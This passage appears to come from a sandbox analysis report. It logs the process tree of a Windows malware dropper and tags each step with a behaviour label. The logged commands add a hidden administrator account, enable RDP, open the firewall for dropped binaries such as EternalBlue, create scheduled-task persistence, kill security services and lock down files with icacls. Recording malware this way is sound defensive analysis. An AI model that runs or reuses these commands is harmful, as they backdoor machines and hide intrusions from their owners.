        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:5148
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:5984
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2452
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4008
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2080
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1492
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:6636
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:5540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:10320
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7404
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:7152
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:9892
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        
        PID:10084
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:3884
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:7348
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:9936
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:9464
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:7728
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:9152
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:10776
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:9972
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:8484
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:8896
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:9320
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:9368
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:11252
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:10748
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:10196
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:9840
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:9056
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:10960
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:4368
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        
        PID:11180
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        
        PID:7188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:10648
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:8256
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6720
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:10816
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3080
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:8800
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:7428
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5DED.tmp\5DEE.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:8744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:11112
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8552
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        
        PID:7092
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:6964
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7656
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:11228
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:3688
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:10804
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:7692
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:8328
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2832
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:6892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6712
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1572
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:7124
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:5380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5116
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:4412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:6756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:4776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:5880
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:6516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:6856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:6376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:5760
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:5924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:316
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:7056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6616
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:7116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:6348
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:7136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6580
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:2336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:3644
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:2884
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:5344
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:3612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:5892
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:2964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6856
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:7648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:920
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:8036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:1660
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:7992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:4816
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:7036
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6868
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:684
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:7072
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:5012
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:3504
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5936
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:6136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5904
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:7288
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:8492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:7440
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:9456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:7600
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:9956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:7768
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:9964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7844
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:9784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7944
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:9228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:8012
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:8132
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      System Location Discovery: System Language Discovery
      PID:9588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:7172
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:7116
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7804
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    PID:8176
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    PID:8436
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:8656
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:7592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8808
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:8816
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8824
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:8840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8848
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8720
